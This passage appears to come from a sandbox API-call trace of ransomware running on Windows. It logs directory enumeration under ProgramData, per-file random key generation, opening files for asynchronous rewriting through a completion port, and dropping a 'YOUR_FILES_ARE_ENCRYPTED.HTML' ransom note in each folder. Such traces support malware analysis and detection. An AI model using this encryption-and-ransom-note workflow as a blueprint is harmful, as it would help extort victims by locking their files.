lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, 
ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0158.698] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0158.698] GetProcessHeap () returned 0x270000 [0158.698] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0158.701] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0158.701] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0158.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, 
ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0158.701] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.702] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc3166700, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0158.702] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0158.702] lstrcmpW (lpString1="cab1.cab", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.702] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.702] lstrlenW (lpString=".cab") returned 4 [0158.702] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0158.702] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0158.702] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0158.703] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=4932896) returned 1 [0158.703] GetProcessHeap () returned 0x270000 [0158.703] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0158.704] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AF") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="81") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="D3") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="77") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2E") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="F0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="F0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C9") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="4F") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="CE") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="5D") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="20") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="93") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="D0") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd762, 
param_2="%02X" | out: param_1="1F") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E8") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="87") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5B") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="48") returned 2 [0158.704] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="8F") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="DE") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="3B") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="27") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="CF") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="F3") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="71") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="13") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="C9") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="ED") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="DF") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="58") returned 2 [0158.705] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2A") returned 2 [0158.706] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0158.706] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.706] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.707] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.707] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0158.707] lstrcmpW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.707] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.707] lstrlenW (lpString=".msi") returned 4 [0158.708] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0158.709] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.709] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.710] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0158.710] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.722] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0159.027] CloseHandle (hObject=0x58c) returned 1 [0159.028] GetProcessHeap () returned 0x270000 [0159.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0159.029] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x17a201b0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x17a201b0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0159.029] FindClose (in: 
hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0159.029] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0159.030] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0159.030] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0159.032] CloseHandle (hObject=0x5a4) returned 1 [0159.032] GetProcessHeap () returned 0x270000 [0159.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.034] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0159.034] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0159.034] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package 
Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0159.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0159.034] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0159.036] CloseHandle (hObject=0x5a0) returned 1 [0159.037] GetProcessHeap () returned 0x270000 [0159.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0159.043] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x179d3ef0, ftCreationTime.dwHighDateTime=0x1d706a6, ftLastAccessTime.dwLowDateTime=0x179d3ef0, ftLastAccessTime.dwHighDateTime=0x1d706a6, ftLastWriteTime.dwLowDateTime=0x179d3ef0, ftLastWriteTime.dwHighDateTime=0x1d706a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0159.043] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.043] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0159.043] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package 
cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.044] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.046] CloseHandle (hObject=0x4a4) returned 1 [0159.046] GetProcessHeap () returned 0x270000 [0159.047] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.047] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0159.047] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned 46 [0159.047] GetProcessHeap () returned 0x270000 [0159.047] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.047] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" [0159.047] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*" [0159.047] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c798490, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa1ccb450, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.049] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x99c671b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0159.049] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 129 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run 
Extensibility Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b3500, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x7c798490, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x45b3500, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0159.050] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 125 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, 
ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 1 [0159.050] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned 128 [0159.050] lstrcmpW (lpString1="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0159.050] lstrlenW (lpString=".swidtag") returned 8 [0159.050] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag") returned=".swidtag" [0159.050] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="REGID1~3.SWI")) returned 0 [0159.050] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.052] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0159.052] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.053] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.055] CloseHandle (hObject=0x4a4) returned 1 [0159.056] GetProcessHeap () returned 0x270000 [0159.057] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.057] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, 